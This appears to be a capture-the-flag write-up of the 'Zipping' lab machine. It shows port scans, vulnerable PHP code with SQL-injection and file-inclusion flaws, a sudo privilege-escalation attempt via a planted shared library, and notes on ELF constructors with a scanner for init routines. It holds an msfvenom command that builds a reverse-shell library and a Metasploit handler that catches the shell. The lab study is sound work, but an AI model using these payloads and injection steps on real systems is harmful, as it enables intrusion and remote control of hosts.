kali@kali ~/D/H/M/Zipping> nmap -Pn -p- -n --min-rate 3000 -T4 --open 10.129.229.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 22:46 CST
Nmap scan report for 10.129.229.87
Host is up (0.33s latency).
Not shown: 65507 filtered tcp ports (no-response), 26 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 44.51 seconds
kali@kali ~/D/H/M/Zipping> sudo nmap -sU -Pn -p- -n --min-rate 3000 -T4 --open 10.129.229.87
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 22:48 CST
Nmap scan report for 10.129.229.87
Host is up.
All 65535 scanned ports on 10.129.229.87 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 44.62 seconds
<?php
// Check to make sure the id parameter is specified in the URL
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    // Filtering user input for letters or special characters
    if (preg_match("/^.*[A-Za-z!#$%^&*()\-_=+{}\[\]\\|;:'\",.<>\/?]|[^0-9]$/", $id, $match)) {
        header('Location: index.php');
    } else {
        // Prepare statement and execute, but does not prevent SQL injection
        $stmt = $pdo->prepare("SELECT * FROM products WHERE id = '$id'");
        $stmt->execute();
        // Fetch the product from the database and return the result as an Array
        $product = $stmt->fetch(PDO::FETCH_ASSOC);
        // Check if the product exists (array is not empty)
        if (!$product) {
            // Simple error to display if the id for the product doesn't exist (array is empty)
            exit('Product does not exist!');
        }
    }
} else {
    // Simple error to display if the id wasn't specified
    exit('No ID provided!');
}
?>
<?php
session_start();
// Include functions and connect to the database using PDO MySQL
include 'functions.php';
$pdo = pdo_connect_mysql();
// Page is set to home (home.php) by default, so when the visitor visits, that will be the page they see.
$page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home';
// Include and show the requested page
include $page . '.php';
?>
kali@kali ~/D/H/M/Zipping> ssh rektsu@10.129.165.180 -i rektsu
The authenticity of host '10.129.165.180 (10.129.165.180)' can't be established.
ED25519 key fingerprint is SHA256:neBkvGOhG23jqZ9Zxfrq+YBNDztKnhVlR+R8Edop1Lo.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:16: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.165.180' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.10 (GNU/Linux 5.19.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Tue Sep  5 14:24:24 2023 from 10.10.14.40
rektsu@zipping:~$ ls
user.txt
The user can run the /usr/bin/stock file with sudo:
rektsu@zipping:~$ sudo -l
Matching Defaults entries for rektsu on zipping:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User rektsu may run the following commands on zipping:
    (ALL) NOPASSWD: /usr/bin/stock
rektsu@zipping:~$ printf "St0ckM4nager\n1\n2\n1\n1\n1\n1\n56\n1\n3\n" | sudo LD_PRELOAD="/home/rektsu/.config/libcounter.so" /usr/bin/stock
sudo: sorry, you are not allowed to set the following environment variables: LD_PRELOAD
kali@kali ~/D/H/M/Zipping> msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=4444 -f elf-so -o libcounter.so.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: libcounter.so.so
msfconsole listening on the port:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.16.21:4444
[*] Command shell session 1 opened (10.10.16.21:4444 -> 10.129.197.170:59916) at 2024-07-16 22:57:12 +0800
Perform lazy binding. Resolve symbols only as the code that references them is executed. If the symbol is never referenced, then it is never resolved. (Lazy binding is performed only for function references; references to variables are always immediately bound when the shared object is loaded.) Since glibc 2.1.1, this flag is overridden by the effect of the LD_BIND_NOW environment variable.
/* The MODE argument to `dlopen' contains one of the following: */
#define RTLD_LAZY         0x00001 /* Lazy function call binding.  */
#define RTLD_NOW          0x00002 /* Immediate function call binding.  */
#define RTLD_BINDING_MASK 0x3     /* Mask of binding time value.  */
#define RTLD_NOLOAD       0x00004 /* Do not load the object.  */
#define RTLD_DEEPBIND     0x00008 /* Use deep binding.  */
#include <stdio.h>
// compile into a so: gcc preload.c -o preload.so -fPIC -shared -ldl

// The constructor attribute puts my_init in the object's init array, so the
// dynamic loader calls it as soon as the .so is loaded, before main() runs.
void __attribute__ ((constructor)) my_init(void);

void my_init(void)
{
    printf("Init part: I love Unicorns");
}

// An ordinary exported function: nothing calls it automatically at load time.
int _init_proc(void)
{
    printf("I love Unicorns");
    return 0;
}
Running it confirms that it really does execute:
But what I see in IDA seems to differ from my earlier understanding of what .init does; I probably need a better understanding of the .so file structure.
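To make that .so structure concrete, here is an added example (not from the original writeup) that parses an ELF64 file's PT_DYNAMIC segment and reports whether the object has a DT_INIT routine and how many DT_INIT_ARRAY entries (constructors such as my_init above) it carries. It assumes Linux's <elf.h> and, for its self-check, the /proc/self/exe path; scan_initialisers, parse_dynamic and mark_loaded are names chosen here. Pointing it at a dropped .so tells a defender that the file will run code the moment it is preloaded, even if none of its exported symbols is ever called.

```c
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct init_info {
    int  has_dt_init;       /* DT_INIT present: a single _init-style routine */
    long init_array_count;  /* function pointers in DT_INIT_ARRAY (constructors) */
};
/* Runs at load time, before main(), like my_init() in preload.c above; it is
 * itself one DT_INIT_ARRAY slot of whatever binary this file is built into. */
int constructor_ran = 0;
static void __attribute__((constructor)) mark_loaded(void) { constructor_ran = 1; }

/* Parse an in-memory ELF64 image; 0 on success, -1 if malformed or no PT_DYNAMIC. */
static int parse_dynamic(const unsigned char *buf, unsigned long len, struct init_info *out) {
    const Elf64_Ehdr *eh = (const Elf64_Ehdr *)buf;
    if (len < sizeof *eh || memcmp(eh->e_ident, ELFMAG, SELFMAG) != 0 ||
        eh->e_ident[EI_CLASS] != ELFCLASS64 ||
        eh->e_phoff + (unsigned long)eh->e_phnum * eh->e_phentsize > len) return -1;
    memset(out, 0, sizeof *out);
    for (int i = 0; i < eh->e_phnum; i++) {
        const Elf64_Phdr *ph = (const Elf64_Phdr *)(buf + eh->e_phoff + (size_t)i * eh->e_phentsize);
        if (ph->p_type != PT_DYNAMIC || ph->p_offset + ph->p_filesz > len) continue;
        const Elf64_Dyn *dyn = (const Elf64_Dyn *)(buf + ph->p_offset);
        for (size_t j = 0; (j + 1) * sizeof *dyn <= ph->p_filesz && dyn[j].d_tag != DT_NULL; j++) {
            if (dyn[j].d_tag == DT_INIT) out->has_dt_init = 1;       /* the _init routine */
            if (dyn[j].d_tag == DT_INIT_ARRAYSZ)                      /* byte size of .init_array */
                out->init_array_count = (long)(dyn[j].d_un.d_val / sizeof(Elf64_Addr));
        }
        return 0;
    }
    return -1;  /* no dynamic segment: a static binary or a plain relocatable */
}

/* Read a file from disk and scan it; -1 if it cannot be read or parsed. */
int scan_initialisers(const char *path, struct init_info *out) {
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t cap = 1 << 20, len = 0, n;
    unsigned char *buf = malloc(cap);
    while (buf && (n = fread(buf + len, 1, cap - len, f)) > 0) {
        len += n;
        if (len == cap) buf = realloc(buf, cap *= 2);   /* grow for large objects */
    }
    fclose(f);
    int rc = buf ? parse_dynamic(buf, len, out) : -1;
    free(buf);
    return rc;
}
```

Run against the binary it is compiled into, the scan finds at least the mark_loaded slot; run against a preload library it shows the same thing the loader will act on before any symbol is resolved.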
Everything I found while searching pointed to the manual below, which is a good resource:
Program Library HOWTO, David A. Wheeler, version 1.20, 11 April 2003
This HOWTO for programmers discusses how to create and use program libraries on Linux. This includes static libraries, shared libraries, and dynamically loaded libraries.